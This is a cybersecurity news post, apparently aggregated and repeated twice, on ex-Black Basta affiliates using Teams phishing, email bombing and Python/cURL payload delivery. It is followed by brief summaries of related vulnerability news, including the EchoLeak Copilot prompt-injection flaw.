Ex-Black Basta Members Employ Microsoft Teams and Python Scripts in 2025 Cyber Attacks

June 11, 2025
Ransomware / Cybersecurity

Former affiliates of the Black Basta ransomware group are reportedly sticking to familiar tactics, utilizing email bombing and Microsoft Teams phishing to gain sustained access to targeted networks. Recent reports from ReliaQuest, shared with The Hacker News, reveal that attackers have begun incorporating Python script execution along with these methods, using cURL requests to retrieve and deploy malicious payloads. This evolution indicates that threat actors are adapting and reorganizing despite challenges faced by the Black Basta identity following the public leak of its internal communications earlier this February. The cybersecurity firm found that 50% of Teams phishing incidents recorded between February and May 2025 originated from onmicrosoft[.]com domains, with breached domains contributing to 42% of all attacks during that timeframe. This approach proves particularly stealthy, enabling attackers to masquerade as legitimate traffic.

Former Black Basta Operatives Leverage Microsoft Teams and Python in 2025 Cyber Attacks

June 11, 2025

A resurgence of cybercrime tactics has emerged from erstwhile operations linked to the Black Basta ransomware group, with recent attacks revealing a continued reliance on traditional methods like email bombing and phishing through Microsoft Teams to gain sustained access to targeted networks. A report from cybersecurity firm ReliaQuest, shared with The Hacker News, has highlighted these developments, showcasing an evolution in the attackers’ methods.

Attackers have expanded their toolkit by incorporating Python script execution into their strategies, enabling them to use cURL commands to retrieve and install malicious payloads within compromised systems. This shift underscores a resilient adaptability among threat actors, persisting even after significant setbacks faced by Black Basta, notably following the leak of their internal communication logs earlier this year.

From February to May 2025, data indicated that nearly half of the phishing attempts via Microsoft Teams originated from onmicrosoft[.]com domains. Additionally, 42% of the phishing incidents during this timeframe involved breached domains, allowing perpetrators to masquerade as legitimate entities. This tactic enhances the stealth of the attacks, making detection and mitigation more challenging for organizations.

As these attackers refine their operational methodologies, the implications for organizations, particularly those in the United States, can be profound. The employment of persuasive phishing techniques and script-enabled attacks aligns with various tactics outlined in the MITRE ATT&CK framework, notably initial access through phishing, persistence via credential dumping, and execution of malicious scripts.

Understanding these tactics is crucial for business owners seeking to bolster their cybersecurity defenses. The ability to recognize potential attack vectors, such as Teams phishing and email bombing, can empower organizations to implement better preventive measures. By fostering a culture of security awareness and enhancing technical safeguards, businesses can mitigate the risks posed by these evolving threats.

As the cyber threat landscape continues to evolve, vigilance remains paramount. Companies must not only invest in advanced cybersecurity technologies but also prioritize continuous training for employees to identify and respond to potential phishing attempts. Keeping abreast of the latest tactics and techniques will be essential for maintaining robust defenses against the persistent threat posed by groups adapting to new technologies and strategies. The convergence of traditional phishing methods with innovative scripting techniques signals an ongoing challenge that the cybersecurity community must confront head-on.

Source link

Related Posts

ConnectWise to Update ScreenConnect Code Signing Certificates Following Security Concerns

June 12, 2025
Vulnerability / Software Security

ConnectWise has announced plans to rotate the digital code signing certificates for ScreenConnect, ConnectWise Automate, and ConnectWise remote monitoring and management (RMM) executables due to security risks. This decision follows concerns raised by a third-party researcher regarding the handling of specific configuration data in earlier versions of ScreenConnect. While the company has not publicly detailed the issue, additional information has been provided in a non-public FAQ for customers, which later surfaced on Reddit. The concern relates to ScreenConnect’s method of storing configuration data in an unsigned area of the installer, which is utilized for passing connection information (such as the callback URL for the agent) without compromising the signature.

Zero-Click AI Vulnerability Exposes Microsoft 365 Copilot Data Without User Interaction

June 12, 2025
Artificial Intelligence / Vulnerability

A new attack method called EchoLeak has been identified as a “zero-click” AI vulnerability, enabling malicious actors to extract sensitive data from Microsoft 365 (M365) Copilot without any user involvement. This critical vulnerability has been assigned CVE identifier CVE-2025-32711, with a CVSS score of 9.3. It requires no action from users and has already been addressed by Microsoft, with no reported instances of exploitation. According to a recent advisory, “AI command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.” This vulnerability has been included in Microsoft’s June 2025 Patch Tuesday updates, bringing the total number of fixed vulnerabilities to 68. Aim Security, which discovered and reported the issue, noted that it exemplifies a large language model (LLM) Scope Violation that leads to indirect prompt injection risks.

Apple Fixes Zero-Click Vulnerability in Messages App Used for Targeted Spyware Attacks on Journalists

June 13, 2025
Spyware / Vulnerability

Apple has revealed that a recently patched security flaw in its Messages app was actively exploited to carry out sophisticated cyber attacks on civil society members. Identified as CVE-2025-43200, the vulnerability was remedied on February 10, 2025, through updates to iOS 18.3.1, iPadOS 18.3.1, iPadOS 17.7.5, macOS Sequoia 15.3.1, macOS Sonoma 14.7.4, macOS Ventura 13.7.4, watchOS 11.3.1, and visionOS 2.3.1. According to the company, “A logic issue existed when processing a maliciously crafted photo or video shared via an iCloud Link,” which was resolved with improved security checks. Apple also acknowledged awareness that this vulnerability may have been exploited in “extremely sophisticated” attacks targeting specific individuals. Notably, the updates for iOS 18.3.1, iPadOS 18.3.1, and iPadOS 17.7.5 also fixed another actively exploited zero-day vulnerability, CVE-2025-24200.

Ransomware Groups Exploit Unpatched SimpleHelp Vulnerabilities for Double Extortion Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported on Thursday that ransomware criminals are taking advantage of unpatched SimpleHelp Remote Monitoring and Management (RMM) systems to compromise clients of an unnamed utility billing software provider. “This incident highlights a growing trend of ransomware groups exploiting unpatched versions of SimpleHelp RMM since January 2025,” the agency stated in an advisory. Earlier this year, SimpleHelp identified several vulnerabilities (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that could lead to information disclosure, privilege escalation, and remote code execution. These vulnerabilities have been actively exploited, including by ransomware groups like DragonForce, to breach specific targets. In a recent report, Sophos revealed that a Managed Service Provider’s SimpleHelp system was compromised by threat actors using these flaws.